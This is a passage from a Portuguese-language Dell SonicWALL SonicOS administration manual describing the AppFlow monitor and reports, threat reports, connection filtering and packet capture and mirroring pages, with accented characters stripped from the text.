desejada, "100%" dever ser inserido. O nmero inteiro
100 inserido seguido pela unidade %.
Formato de grfico Exibe os dados de Monitor de vrios ncleos em um
de barras formato de grfico de barras.
Formato do grfico Exibe os dados de Monitor de vrios ncleos em um

de fluxo formato de grfico de fluxo.

Monitor em tempo real do IPv6
Para obter informaes completas sobre a implementao do IPv6 do SonicOS,
consulte IPv6 na pgina 1443.
A Visualizao do Monitor em tempo real configurada da mesma forma no IPv6 e no IPv4:

selecione os botes de opo na lista suspensa para alterar a exibio/configurao.
Painel > Trao AppFlow

A pgina Painel > Trao AppFlow fornece as mesmas informaes fornecidas em Painel >
Relatrios AppFlow. Apenas em Trao AppFlow, as informaes so mostradas em grficos
de um a dez para os itens principais em cada categoria. O Trao AppFlow exibe grficos para
os seguintes itens:
Principais aplicativos
Principais usurios
Principais vrus
Principais intruses
Principal spyware
Principais classificaes de URL
Principais locais
Principais endereos IP

O grfico a seguir mostra os quatro primeiros grficos na pgina Trao AppFlow. Os grficos
para as outras categorias so semelhantes.
Painel > Monitor AppFlow

O Monitor AppFlow fornece administradores com dados de rede em tempo real, de entrada e
de sada. Vrios modos de exibio e opes personalizveis na interface de Monitoramento
de AppFlow ajudam a visualizar os dados de trfego por aplicativos, usurios, URLs,
iniciadores, respondentes, ameaas, VoIP, VPN, dispositivos ou por contedos.

Opes de filtro na pgina 65
Guias Monitor AppFlow na pgina 65
Barra de ferramentas de Monitor AppFlow na pgina 65
Opes de grupo na pgina 67

Status do Monitor AppFlow na pgina 68
Exibies de Monitor AppFlow na pgina 69
Usando opes de filtragem na pgina 71
Gerando relatrio de visualizao de aplicativo na pgina 72
Opes de filtro
As Opes de filtro de Monitor AppFlow permitem que o administrador filtre os dados de
entrada e em tempo real. Os administradores podem aplicar, criar e excluir filtros
personalizados para personalizar as informaes que desejam ver. As Opes de filtro se
aplicam a todas as guias de Fluxo de aplicativo. Consulte Usando opes de filtragem na
pgina 71.
Guias Monitor AppFlow

As guias Monitor AppFlow contm detalhes sobre o trfego de rede de entrada e sada. Cada
guia oferece uma viso facetada do fluxo de rede. Os dados so organizados por Aplicativos,
Usurios, URLs, Iniciadores, Respondentes, Ameaas, VoIP, VPN, Dispositivos e Contedos.
A guia Aplicativos exibe uma lista de aplicativos que acessam a rede atualmente.
A guia Usurios exibe uma lista de usurios conectados rede atualmente.
A guia URLs exibe uma lista de URLs acessadas pelos usurios atualmente.
A guia Iniciadores exibe detalhes sobre iniciadores de conexo atual.
A guia Respondentes exibe detalhes sobre respondentes de conexo atual.
A guia Ameaas exibe uma lista de ameaas encontradas pela rede.
A guia VoIP exibe o trfego atual de VoIP e de mdia.
A guia VPN exibe uma lista de sesses VPN conectadas rede.
A guia Dispositivos exibe uma lista de dispositivos conectados atualmente rede.
A guia Contedos exibe informaes sobre o tipo de trfego que passa pela rede.
Barra de ferramentas de Monitor AppFlow

A barra de ferramentas AppFlow permite a personalizao da interface de Monitor AppFlow. A
capacidade de criar regras e adicionar itens nos filtros permite mais controle de usurio e
aplicativo. Exibies diferentes, pausam e reproduzem habilidades, intervalos de dados e
taxas de atualizao personalizveis tambm esto disponveis para auxiliar na exibio de
dados de entrada e em tempo real.

Opo Widget Descrio
Criar regra Inicia o assistente de controle de aplicativos. Para obter
mais informaes sobre como usar esse assistente,
consulte Controle de aplicativos na pgina 573.
Viso do filtro Inclui itens selecionados no filtro.
Intervalo O perodo de tempo em que os dados so coletados.
Grupo Categoriza as selees de acordo com as opes de

agrupamento disponveis que variam dependendo da
guia selecionada.
Consulte Opes de grupo na pgina 67.
Exibio de lista Fornece uma exibio de lista detalhada do fluxo de
dados.
Exibio de grfico Fornece uma exibio de grfico de pizza do fluxo de

de pizza dados.
Exibio de grfico Fornece uma exibio de grfico de fluxo do fluxo de

de fluxo dados.
Exportar Exporta o fluxo de dados no formato (.csv) de varivel

separado por vrgula.
Imprimir relatrio Gerar um relatrio de visualizao de aplicativo. Para

em PDF obter mais informaes, consulte Gerando relatrio de
visualizao de aplicativo na pgina 72.
Configurao Permite a personalizao da exibio habilitando ou

desabilitando colunas para Aplicativos, Sesses,
Pacotes, Bytes, Taxa e Ameaas. Tambm permite que
o administrador habilite ou desabilite vrgulas em
campos numricos.
Boto Atualizar Atualiza os dados em tempo real.

Opo Widget Descrio
Atualizao de Fornece atualizaes de status sobre assinaturas de
status Aplicativo, Banco de dados de GAV, Banco de dados de
Spyware, Banco de dados de IPS, Banco de dados do
pas, Fluxos mximos no Banco de dados e Status de
CFS. Consulte Status do Monitor AppFlow na
pgina 68 para obter mais informaes.
Um cone de status verde significa que todas as
assinaturas apropriadas e bancos de dados esto
ativos.
Um cone de status amarelo indica que alguns ou todos
os bancos de dados de assinatura ainda esto sendo
transferidos por download ou no podem ser ativados.
Taxa de atualizao Taxa em que os dados so atualizados.
Um nmero inteiro entre 10 e 999 deve ser especificado.
Se 300 for inserido no campo numrico, isso significa
que o fluxo de dados ser atualizado a cada 300
segundos.
Pausar/Reproduzir Congela e descongela o fluxo de dados. Fazer Isso
oferece a flexibilidade de administrador ao analisar
dados em tempo real.
Opes de grupo
A opo Grupo classifica os dados com base no grupo especificado. Cada guia contm opes
de agrupamentos diferentes.
A guia Aplicativos pode ser agrupada por:
Aplicativo: Exibe todo o trfego gerado por aplicativos individuais.
Categoria: Agrupa todo o trfego gerado por uma categoria de aplicativo.
A guia Usurios pode ser agrupada por:
Nome do usurio: Agrupa todo o trfego gerado por um usurio especfico.
Endereo IP: Agrupa todo o trfego gerado por um endereo IP especfico.
Nome de domnio: Agrupa todo o trfego gerado por um nome de domnio especfico.
Tipo de autenticao: Agrupa todo o trfego gerado por um mtodo de autorizao
especfico.
A guia URL pode ser agrupada de acordo com:
URL: Exibe todo o trfego gerado por cada URL.
Nome de domnio: Agrupa todo o trfego gerado por um nome de domnio.
Classificao: Agrupa todo o trfego gerado com base na classificao CFS.
A guia Iniciadores pode ser agrupada de acordo com:
Endereo IP: Agrupa todo o trfego gerado por um endereo IP especfico.
Interface: Agrupa todo o trfego de acordo com a interface do firewall.
Pas: Agrupa todo o trfego gerado por cada pas, com base no banco de dados do IP
do pas.
Nome de domnio: Agrupa todo o trfego gerado por um nome de domnio.
A guia Respondentes pode ser agrupada de acordo com:
Endereo IP: Agrupa todo o trfego por endereo IP.

Interface: Agrupa respondentes por interface.
Pas: Agrupa respondentes por cada pas, com base no banco de dados do IP do pas.
Nome de domnio: Agrupa respondentes por nome de domnio.
A guia Ameaas pode ser agrupada de acordo com:
Intruses: Exibe fluxos nos quais intruses foram identificadas.
Vrus: Exibe fluxos nos quais vrus foram identificados.
Spyware: Exibe fluxos nos quais spyware foi identificado.
Spam: Exibe todos os fluxos que entram na categoria de spam.
Tudo: Exibe todas as ameaas de qualquer tipo.
A guia VoIP pode ser agrupada de acordo com:
Tipo de mdia: Agrupa fluxos de VoIP de acordo com o tipo de mdia.
ID do chamador: Agrupa fluxos de VoIP de acordo com o ID do chamador.
A guia VPN pode ser agrupada de acordo com:
Endereo IP remoto: Agrupa acesso de fluxos VPN de acordo com o endereo IP
remoto.
Endereo IP local: Agrupa acesso de fluxos VPN de acordo com o endereo IP local.
Nome: Agrupa acesso de fluxos VPN de acordo com o nome de tnel.
A guia Dispositivos pode ser agrupada de acordo com:
Endereo IP: Agrupa fluxos por endereos IP dentro da rede.
Interface: Agrupa fluxos por interfaces no firewall.
Nome: Agrupa fluxos por nome de dispositivo ou endereo MAC.
A guia Contedo pode ser agrupada de acordo com:
Endereo de e-mail: Agrupa Contedo por endereo de e-mail.
Nome do arquivo: Agrupa fluxos por tipo de arquivo detectado.
Status do Monitor AppFlow

A caixa de dilogo Status de Monitor AppFlow ser exibida quando o cursor passar sobre o
boto Status na barra de ferramentas. O Status de Monitor AppFlow fornece atualizaes de
assinatura sobre Regras de aplicativo, Controle de aplicativos avanado, GAV, IPS, Anti-
-Spyware, CFS, Anti-Spam, BWM e bancos de dados do pas.

A opo para habilitar ou desabilitar a coleo de fluxos est disponvel na caixa de dilogo
Status. Se a caixa de dilogo Status no for desejada, clique em fechar no canto superior
direito.
Exibies de Monitor AppFlow

Trs exibies esto disponveis para o Monitor AppFlow: Exibio da lista detalhada, Exibio
do grfico de pizza e do grfico de fluxo. Cada exibio fornece ao administrador uma exibio
exclusiva de dados de entrada e em tempo real.
Exibio de lista na pgina 69
Exibio de grfico na pgina 71
Exibio de lista
Na Exibio de lista, cada guia AppFlow composta por colunas que exibem dados em tempo
real. Essas colunas so organizadas em categorias classificveis.
Caixa de seleo: Permite que o administrador selecione o item de linha para a criao
de filtros.

Coluna principal: O ttulo da coluna principal dependente da guia selecionada. Por
exemplo, se a guia Usurios estiver selecionada, o cabealho da coluna principal ler
"Usurios". Nessa coluna, o nome dos Usurios conectados rede so exibidos. Clicar nos
itens nessa coluna abrir um pop-up com informaes relevantes sobre o item exibido.
Sesses: Clicar nesse nmero abrir uma tabela de todas as sesses ativas.
Pacotes: Exibe o nmero de pacotes de dados transferidos.
Bytes: Exibe o nmero de bytes transferidos.
Taxa (KBps): Exibe a taxa na qual os dados so transferidos.
Ameaas: Exibe o nmero de ameaas encontradas pela rede.
Total: Exibe o total de Sesses, Pacotes e Bytes enviados durante a durao do intervalo
atual.
Detalhes do aplicativo
Cada item listado na coluna principal fornece um link para uma caixa de dilogo Detalhes do
aplicativo. Uma exibio aparecer quando os links de item forem clicados. A caixa de dilogo
fornece:
Descrio do item
Informaes pertinentes categoria, nvel de ameaa, tipo de tecnologia no qual o item se
inclui e outras informaes adicionais
Os detalhes do aplicativo sero particularmente teis quando um Administrador no
reconhecer o nome de um aplicativo.

Exibio de grfico
A Exibio de grfico exibe os principais aplicativos e a porcentagem de largura de banda
usada. A porcentagem de largura de banda usada determinada tomando a quantidade total
de largura de banda usada pelos aplicativos principais e dividindo esse total pela quantidade
dos aplicativos principais.
Usando opes de filtragem

Usar as opes de filtragem permite que os administradores reduzam a quantidade de dados
vistos no Monitor AppFlow. Fazendo isso, os administradores podem se concentrar nos pontos
de interesse sem distrao de outros aplicativos. Para usar as Opes de filtragem, execute
as seguintes etapas:

Etapa 1 Navegue at Painel > Monitor de AppFlow > Aplicativos. Marque as caixas de seleo dos
aplicativos que deseja adicionar ao filtro. Nesse caso, Ventrilo selecionado.
g. Clique em Exibio de filtro para adicionar Ventrilo ao filtro.

h. Depois que o aplicativo for adicionado ao filtro, apenas Ventrilo ser visvel na guia
Aplicativos.
Mais informaes sobre Usurios, conectividade de mesmo nvel e pacotes enviados so
visveis nas guias Monitor AppFlow. Os Usurios que usam Ventrilo so visveis na guia
Usurios. Os Endereos IP desses usurios so visveis na guia Iniciadores. Os endereos IP
dos pontos conectados que esto compartilhando pacotes so visveis na guia Respondentes.
Gerando relatrio de visualizao de aplicativo

O recurso de controle e inteligncia de aplicativo permite que os administradores mantenham
o controle granular de aplicativos e usurios criando polticas de gerenciamento de largura de
banda com base em categorias predefinidas locais, aplicativos individuais ou ainda usurios e
grupos. Com o recurso Visualizao de aplicativo, os administradores so capazes de exibir
grficos de aplicativos em tempo real, largura de banda de ingresso e de egresso, sites
visitados e todas as atividades do usurio. Os administradores so capazes de ajustar polticas
de rede com base nessas observaes crticas. A janela Uso do aplicativo e relatrio de
risco combina os resultados desses dois recursos em um relatrio que pode ser transferido
por download listando as seguintes categorias:
Aplicativos de alto risco em uso
Principais categorias de URL em uso
Aplicativos com o uso mais alto de largura de banda

Uso do aplicativo por categoria e tecnologia
Principais descobertas de caractersticas de rede
Recomendaes com base nas principais descobertas
Navegue at a pgina Painel > Monitor de fluxo de aplicativo e clique no boto Baixar
relatrio em PDF na barra de ferramentas AppFlow. Em seguida, clique no boto Gerar
relatrio para obter um relatrio especfico gerado dinamicamente para o firewall. Note que o
relatrio pode levar alguns minutos para ser gerado e baixado.
Depois que o relatrio for gerado, um resumo executivo ser fornecido na parte superior do
relatrio para obter uma viso geral holstica da rede. O relatrio contm uma captura
instantnea em tempo real do trfego de rede para orient-lo na implementao de novas
polticas de gerenciamento de largura de banda. Um exemplo, o relatrio Uso do aplicativo e
anlise de risco fornecido abaixo listando os aplicativos com o uso mais alto de largura de
banda, sua categoria de aplicativo, o nmero de sesses, nvel de risco do aplicativo e uma
descrio detalhada do aplicativo.

Monitor do IPv6 no App Flow
A Visualizao do Monitor no App Flow configurada da mesma forma no IPv6 e no IPv4:

alterne os botes de opo Exibir verso do IP para alterar a exibio/configurao.

Painel > Relatrios AppFlow
A pgina de Relatrios AppFlow oferece administradores com relatrios programados
configurveis por aplicativos, vrus, intruses, spyware e classificao de URL. Estatsticas de
Relatrios de AppFlow permitem que os administradores de rede exibam um relatrio
agregado de nvel superior do que est acontecendo em sua rede. Isso permite que os
administradores de rede respondam s perguntas seguintes com um resumo rpido:
Quais so os principais aplicativos mais usados em execuo na minha rede?
Quais aplicativos, em termos de nmero total de bytes e sesses, consumem a largura de
banda da minha rede?
Quais aplicativos possuem vrus, intruses e spyware?
Quais categorias de site esto sendo visitadas por meus usurios?
Os dados de relatrio podem ser exibidos do ponto da ltima reinicializao do sistema, desde
a reinicializao do sistema ou definindo um intervalo de programao. A pgina tambm
fornece a capacidade de programar um relatrio enviado por FTP ou e-mail.

Baixando assinaturas de servios de segurana da Dell SonicWALL na pgina 76
Exibindo relatrios AppFlow desde o momento do reincio na pgina 76
Exibindo relatrios AppFlow desde o momento da ltima redefinio na pgina 76
Exibindo relatrios AppFlow na programao na pgina 76

Baixando assinaturas de servios de segurana da Dell
SonicWALL
O recurso Relatrios AppFlow requer que voc tenha os downloads de assinatura de servios
de segurana da Dell SonicWALL habilitados para as atualizaes de proteo dinmica mais
recentes. Clique no boto Status para exibir a lista de Servios de segurana habilitados,
conforme mostrado a seguir.
Exibindo relatrios AppFlow desde o momento do reincio

Para exibir um relatrio de AppFlow desde a ltima reinicializao ou reincio do firewall,
selecione Desde o reincio no menu suspenso Ver. Este relatrio mostra as estatsticas
agregadas desde a ltima reinicializao do dispositivo indicado em verde. Por exemplo,
indicado por data e hora:
DESDE: 22/11/2011 15h40min06s.
Exibindo relatrios AppFlow desde o momento da ltima

redefinio
Para exibir um relatrio AppFlow desde a ltima redefinio do firewall, selecione Desde a
ltima redefinio no menu suspenso Ver. Este relatrio mostra as estatsticas agregadas
desde a ltima vez que o administrador desmarcou as estatsticas pressionando o boto
Redefinir indicado em verde. Por exemplo, indicado por data e hora: DESDE: 23/11/2011
18h33min02s. A opo de redefinio permite que os administradores de rede exibam
rapidamente as estatsticas de relatrio AppFlow a partir de uma nova redefinio de fluxos de
rede. A redefinio desmarca os contadores vistos na parte inferior da pgina que exibe os
totais de contadores para o nmero de sesses, bytes de Iniciador e Respondente, para o
nmero de ameaas e intruses.
Exibindo relatrios AppFlow na programao

Para exibir um relatrio de AppFlow por uma hora de incio e de fim de uma programao
definida, selecione Na programao no menu suspenso Ver e clique no boto Configurar.
Este relatrio mostra estatsticas AppFlow coletadas durante o intervalo de tempo especificado
nas opes configurar definies. Depois de a hora de fim da programao ser atingida, as

estatsticas AppFlow programadas sero exportadas automaticamente para um servidor FTP
ou um servidor de e-mail. Os dados estatsticos AppFlow so exportados no formato de arquivo
CSV. Depois de as estatsticas de AppFlow serem exportadas, os dados sero atualizados e
desmarcados.
Para configurar um relatrio Na programao AppFlow, execute a seguinte configurao de
seleo de um servidor FTP ou de um servidor de e-mail para a exportao de arquivo CSV:
Etapa 1 Navegue at a pgina AppFlow > Relatrios AppFlow. Selecione Na programao no menu
suspenso Ver e clique no boto Configurar. A pgina de opes Programar relatrio exibida.
i. Selecione para ter os dados de Relatrios AppFlow enviados automaticamente a um

servidor FTP ou a um servidor de e-mail. Se o servidor de e-mail exigir autenticao SMTP,
insira o login e a senha do servidor SMTP.
j. Clique no boto Definir programao para definir uma programao de incio e de fim. A
pgina de opo de programao Relatrios AppFlow exibida.
k. No tipo de programao, selecione Uma vez para criar uma programao de uma vez,
selecione Recorrente para criar uma programao contnua ou selecione Misto para criar
uma programao de uma vez e uma programao contnua. As opes de programao
Uma vez permitem definir programaes de relatrios com base em um calendrio de data
de incio e de fim com o tempo em horas e minutos. As opes de programao Recorrente
permitem selecionar programaes contnuas com base em dias da semana e destinos de
tempo, de incio e de fim, em hora e minuto. A programao Recorrente exibe as selees
na lista de programaes.
l. Clique em OK para salvar a programao de Relatrios AppFlow.
m. Na pgina de opes Relatrios da programao, clique no boto Aplicar para comear a
usar as configuraes de objeto de programao Relatrios AppFlow.

Painel > Relatrios de ameaas
Esta seo descreve como usar o recurso Relatrios de ameaas em um dispositivo de
segurana da Dell SonicWALL. Esta seo contm as seguintes subsees:
Viso geral de relatrios de ameaas na pgina 78
Tarefas de configurao dos relatrios de ameaas na pgina 80
Viso geral de relatrios de ameaas

Esta seo fornece uma apresentao do recurso Relatrios de ameaas. Esta seo contm
as seguintes subsees:
O que so Relatrios de ameaas? na pgina 78
Benefcios na pgina 78
Como funcionam os relatrios de ameaas? na pgina 79
O que so Relatrios de ameaas?

Os Relatrios de ameaas fornecem relatrios dos dados de proteo contra as ameaas mais
recentes a partir de um nico dispositivo de segurana da Dell SonicWALL e dos dados
agregados de proteo contra ameaas a partir de dispositivos de segurana da Dell
SonicWALL implantados em todo o mundo. Os Relatrios de ameaas so exibidos
automaticamente na autenticao com xito para um dispositivo de segurana da Dell
SonicWALL e podem ser visualizados em qualquer momento navegando at o menu Painel >
Relatrios de ameaas no menu da esquerda.
Os relatrios nos Relatrios de ameaas incluem:
Vrus bloqueados
Intruses impedidas
Spyware bloqueado
Multimdia (mensagens Instantneas/P2P) detectada/bloqueada
Cada relatrio inclui um grfico de ameaas bloqueadas ao longo do tempo e uma tabela das
principais ameaas bloqueadas. Os relatrios, atualizados a cada hora, podem ser
personalizados para exibir dados para as ltimas 12 horas, 14 dias, 21 dias ou 6 meses. Para
facilitar a exibio, os Relatrios de ameaas podem ser transformados em um formato de
arquivo PDF com o clique de um boto.
Benefcios
Os Relatrios de ameaas fornecem as informaes de proteo contra ameaas mais
recentes para mant-lo informado sobre ameaas potenciais que esto sendo bloqueadas por
dispositivos de segurana da Dell SonicWALL. Se voc se inscrever em servios de segurana
da Dell SonicWALL, incluindo Gateway Anti-Virus, Gateway Anti-Spyware, Intrusion Prevention
Service (IPS) e Content Filtering Service, ser protegido automaticamente contra as ameaas
relatadas pelos Relatrios de ameaas da Dell SonicWALL. Os servios de segurana do
SonicOS incluem novas atualizaes de assinatura contnuas para proteo contra os ataques
de vrus e spyware mais recentes.

Como funcionam os relatrios de ameaas?
A pgina Relatrios de ameaas fornece estatsticas de proteo contra ameaas de nvel de
dispositivo e globais. No nvel de dispositivo, os dados de proteo contra ameaas do
dispositivo de segurana da Dell SonicWALL so exibidos. No nvel global, a pgina Relatrios
de ameaas atualizada a cada hora no servidor de back-end da Dell SonicWALL com os
dados agregados de proteo contra ameaas dos firewalls implantados em todo o mundo. Os
dados fornecidos pelo servidor de back-end da Dell SonicWALL esto armazenados em cache
localmente para entrega confivel.
Para ser protegido contra as ameaas relatadas nos Relatrios de ameaas da Dell
SonicWALL, recomendvel adquirir os servios de segurana da Dell SonicWALL. Para obter
mais informaes sobre os servios de segurana da Dell SonicWALL, consulte Servios de
segurana na pgina 1155.

Nota O dispositivo de segurana da Dell SonicWALL deve ter conectividade com a Internet
(incluindo a conexo a um servidor DNS) para receber as estatsticas de proteo contra
as ameaas mais recentes do servidor de back-end da Dell SonicWALL que relata dados
agregados dos firewalls implantados globalmente. Se voc perder a conectividade, os
dados armazenados em cache da ltima atualizao sero exibidos e os dados mais
recentes no estaro disponveis at que a conectividade seja restaurada.
Tarefas de configurao dos relatrios de ameaas

A pgina Relatrios de ameaas pode ser configurada para exibir estatsticas globais ou de
nvel de dispositivo, para exibir as estatsticas de diferentes perodos de tempo e para gerar
um arquivo PDF personalizado.
Os Relatrios de ameaas so exibidos automaticamente no login com xito para um
dispositivo de segurana da Dell SonicWALL. possvel acessar os Relatrios de ameaas a
qualquer momento, navegando at Painel > Relatrios de ameaas no menu da esquerda.
possvel ver a tela introdutria mostrada abaixo antes da exibio do painel.
Esta seo fornece as seguintes subsees:

Alternando para exibio global ou de nvel de dispositivo na pgina 80
Selecionando o intervalo de tempo personalizado na pgina 80
Gerando um Relatrios de ameaas em PDF na pgina 81
Alternando para exibio global ou de nvel de dispositivo

Para exibir relatrios globais de Relatrios de ameaas, selecione o boto de opo prximo
a Global na parte superior da tela Painel > Relatrios de ameaas. Para exibir relatrios de
nvel de dispositivo, selecione o boto de opo prximo ao nmero de srie do dispositivo.
Selecionando o intervalo de tempo personalizado

Relatrios de ameaas-padro para uma exibio de relatrios dos "ltimos 14 Dias" que
fornece uma exibio agregada de ameaas bloqueadas durante esse perodo de tempo.
possvel configurar cada relatrio a um dos quatro perodos de tempo opcionais. Cada relatrio
pode ser configurado para refletir um perodo de tempo diferente. Para alterar um relatrio para
refletir um perodo de tempo diferente, execute as seguintes etapas:

Etapa 1 Selecione o relatrio que deseja alterar:
Vrus bloqueados
Intruses impedidas
Spyware bloqueado
Multimdia (mensagens Instantneas/P2P) detectada/bloqueada
n. Prximo ao ttulo do relatrio selecionado, clique no menu suspenso e selecione uma das
seguintes opes:
ltimas 12 Horas - exibe informaes de ameaas das ltimas 12 horas
ltimos 14 Dias - exibe informaes de ameaas dos ltimos 14 dias
ltimos 21 Dias - exibe informaes de ameaas dos ltimos 21 dias
ltimos 6 meses - exibe informaes de ameaas dos ltimos 6 meses
Gerando um Relatrios de ameaas em PDF

Para criar uma verso em PDF dos Relatrios de ameaas, selecione a exibio desejada
(global ou de nvel de dispositivo) e o perodo de tempo desejado para cada relatrio (as
ltimas 12 horas, 14 dias, 21 dias ou 6 meses). Clique no boto na parte superior
direita.
Painel > Monitor de usurio

A pgina Painel > Monitor de usurio exibe detalhes em todas as conexes de usurio com
o dispositivo de segurana da Dell SonicWALL.

Painel > Monitor BWM
A pgina Painel > Monitor BWM exibe gerenciamento de largura de banda por interface para
trfego de rede de ingresso e de egresso. Os grficos de monitor BWM esto disponveis para
configuraes de poltica em tempo real, mais alto, alto, mdio-alto, mdio-baixo, baixo e mais
baixo. O intervalo de exibio configurvel em 60 segundos, 2 minutos, 5 minutos e 10
minutos (padro). A taxa de intervalo de atualizao configurvel de 3 a 30 segundos. A
prioridade de gerenciamento de largura de banda representada por garantida, mxima e
descartada.
Painel > Monitor de conexes

A pgina Painel > Monitor de conexes exibe detalhes em todas as conexes ativas para o

Exibindo conexes
As conexes so listadas na tabela Monitor de conexes.
Filtrando conexes exibidas

possvel filtrar os resultados para exibir apenas as conexes que correspondem a
determinados critrios. possvel filtrar por IP de origem, IP de destino, Porta de destino,
Interface de orig em, Interface de dest ino e Protocolo. Insira os critrios de filtro na tabela
Configuraes do monitor de conexes.
Os campos nos quais foram inseridos valores so combinados em uma cadeia de caracteres
de pesquisa com um E lgico. Por exemplo, se voc inserir valores para IP de origem e IP de
destino, a cadeia de caracteres de pesquisa procurar conexes que correspondam a:
IP de origem E IP de Destino
Marque a caixa Grupo prxima a qualquer um dos dois ou mais critrios para combin-los com
um OU lgico. Por exemplo, se voc inserir valores para IP de origem, IP de destino e
Protocolo e marcar Grupo prximo ao IP de origem e IP de destino, a cadeia de caracteres
de pesquisa procurar conexes que correspondam a:
(IP de origem OU IP de destino) E Protocolo
Clique em Aplicar filtro para aplicar o filtro imediatamente tabela Ativar conexes. Clique
em Redefinir para limpar o filtro e exibir novamente os resultados no filtrados.
possvel exportar a lista de conexes ativas para um arquivo. Clique em Exportar
resultados e selecione se voc deseja que os resultados sejam exportados para um arquivo
de texto simples ou um arquivo CSV (valores separados por vrgula) para importao para uma
planilha, ferramenta de relatrio ou banco de dados. Se for solicitado a voc Abrir ou Salvar o
arquivo, selecione Salvar. Em seguida, insira um nome de arquivo e caminho e clique em OK.

Monitor de conexes do IPv6
O Monitor de conexes configurado da mesma forma no IPv6 e no IPv4: alterne os botes

de opo Exibir verso do IP para alterar a exibio/configurao.
Painel > Monitor de pacotes

Nota Para maior convenincia e acessibilidade, a pgina Monitor de pacotes pode ser acessada
em Painel > Monitor de pacotes ou Sistema > Monitor de pacotes. A pgina idntica,
independentemente da guia por meio da qual acessada. Para obter informaes
detalhadas de viso geral e configurao sobre o Monitor de pacotes, consulte Painel >
Monitor de pacotes na pgina 84.
Usando o monitor de pacotes e o espelho de pacotes

Alm do boto Configurar, a parte superior da pgina Painel > Monitor de pacotes oferece
vrios botes para o controle geral de recurso e exibio do monitor de pacotes. Eles incluem
o seguinte:
Monitorar tudo redefine as configuraes atuais do filtro de monitor e configuraes
avanadas de pgina para que o trfego em todas as interfaces locais seja monitorado.
Uma caixa de dilogo de confirmao ser exibida ao clicar neste boto.

Monitor padro redefine as configuraes atuais do filtro do monitor e as configuraes
avanadas de pgina para as configuraes padro de fbrica. Uma caixa de dilogo de
confirmao ser exibida ao clicar neste boto.
Limpar limpa a fila de monitores de pacotes e as estatsticas exibidas para o buffer de
captura, espelhamento e criao de log FTP. Uma caixa de dilogo de confirmao ser
exibida ao clicar neste boto.
Atualizar atualiza as janelas de exibio de pacotes nesta pgina para mostrar novos
dados de buffer.
A pgina Painel > Monitor de pacotes mostrada abaixo:
Para obter explicaes sobre os indicadores de status na parte superior da pgina, consulte
Noes bsicas sobre os indicadores de status na pgina 155.
Os outros botes e exibies nesta pgina so descritos nas sees a seguir:
Iniciando e interrompendo a captura de pacotes na pgina 86
Iniciando e parando o espelho de pacotes na pgina 86
Exibindo pacotes capturados na pgina 86

Iniciando e interrompendo a captura de pacotes
possvel iniciar uma captura de pacotes que usa configuraes padro sem configurar
critrios especficos para captura de pacotes, exibio, exportao de FTP e outras
configuraes. Se voc iniciar uma captura de pacotes padro, o dispositivo de segurana da
Dell SonicWALL capturar todos os pacotes, exceto aqueles para comunicao interna e ser
interrompido quando o buffer estiver completo ou ao clicar em Parar captura.
Etapa 1 V at a pgina Painel > Monitor de pacotes.

a. Opcionalmente, clique em Limpar para definir as estatsticas de volta a zero.
b. Em Monitor de pacotes, clique em Iniciar captura.
c. Para atualizar as janelas de exibio de pacotes para mostrar novos dados de buffer, clique
em Atualizar.
d. Para parar a captura de pacotes, clique em Parar captura.
possvel exibir os pacotes capturados nas sees Pacotes capturados, Detalhes do pacote
e Despejo hexa da tela. Consulte Exibindo pacotes capturados na pgina 86.
Iniciando e parando o espelho de pacotes

possvel iniciar o espelhamento de pacotes que usa as configuraes do espelho
configurado clicando em Iniciar espelho. No necessrio configurar primeiro os critrios
especficos para exibio, criao de log, exportao de FTP e outras configuraes. O
espelhamento de pacotes ser interrompido ao clicar em Parar espelho.

a. Em Monitor de pacotes, clique em Iniciar espelho para iniciar o espelhamento de pacotes
de acordo com as configuraes definidas.
b. Para parar o espelhamento de pacotes, clique em Parar espelho.
Exibindo pacotes capturados

A pgina Painel > Monitor de pacotes fornece trs janelas para exibir diferentes vises de
pacotes capturados. As sees a seguir descrevem as janelas de exibio:
Sobre a janela de pacotes capturados na pgina 86
Sobre a janela Detalhes do pacote na pgina 88
Sobre a janela Transbordo hexa na pgina 88
Sobre a janela de pacotes capturados
A janela Pacotes capturados exibe as seguintes estatsticas sobre cada pacote:

N O nmero do pacote em relao ao incio da captura
Hora a data e a hora em que o pacote foi capturado

Entrada a interface do firewall na qual o pacote que chegou marcado com um asterisco
(*). A abreviao de tipo de subsistema mostrada entre parnteses. As abreviaes de
tipo de subsistema so definidas na tabela a seguir.
Abreviao Definio
i Interface
hc Criptografia ou descriptografia baseada em hardware
sc Criptografia ou descriptografia baseada em software
m Difuso seletiva
r Remontagem do pacote
s Pilha de sistema
IP Auxiliar de IP
f Fragmentao
Egresso a interface do firewall na qual o pacote foi capturado quando enviado

A abreviao de tipo de subsistema mostrada entre parnteses. Consulte a tabela
acima para definies de abreviaes de tipo de subsistema
IP de origem o endereo IP de origem do pacote
IP de destino o endereo IP de destino do pacote
Tipo de Ether o tipo de Ethernet do pacote de seu cabealho Ethernet
Tipo de pacote O tipo do pacote dependendo do tipo Ethernet, por exemplo:
Para os pacotes de IP, o tipo de pacote pode ser TCP, UDP ou outro protocolo
executado por IP
Para os pacotes de PPPoE, o tipo de pacote pode ser PPPoE Discovery ou PPPoE
Session
Para os pacotes ARP, o tipo de pacote pode ser Solicitao ou Resposta
Portas [Orig., Dest.] as portas TCP ou UDP de origem e destino do pacote
Status o campo de status para o pacote

O campo status mostra o estado do pacote em relao ao firewall. Um pacote pode ser
descartado, gerado, consumido ou encaminhado pelo dispositivo de segurana da Dell
SonicWALL. possvel posicionar o ponteiro do mouse sobre os pacotes descartados ou
consumidos para mostrar as informaes a seguir.
Status do
pacote Valor exibido Definio de valor exibido
Descartado ID do Mdulo = <nmero Valor para o ID do subsistema de protocolo
inteiro>
Cdigo de descarte = Motivo para descartar o pacote
<nmero inteiro>
ID de referncia: <cdigo> Dados especficos SonicWALL
Consumido ID do Mdulo = <nmero Valor para o ID do subsistema de protocolo
inteiro>
Comprimento [real] o valor de comprimento o nmero de bytes capturados no buffer

para este pacote. Valor real, entre colchetes, o nmero de bytes transmitidos no pacote.
Sobre a janela Detalhes do pacote
Ao clicar em um pacote na janela Pacotes capturados, os campos de cabealho de pacote

sero exibidos na janela Detalhes do pacote. A exibio variar dependendo do tipo de
pacote selecionado.
Sobre a janela Transbordo hexa
Ao clicar em um pacote na janela Pacotes capturados, os dados do pacote sero exibidos no

formato hexadecimal e ASCII na janela Despejo hexa. O formato hexadecimal mostrado no
lado esquerdo da janela, com os caracteres ASCII correspondentes exibidos direita de cada
linha. Quando o valor hexadecimal for zero, o valor ASCII ser exibido como um ponto.

Painel > Monitor de log
Nota Para maior convenincia e acessibilidade, a pgina Monitor de log pode ser acessada a
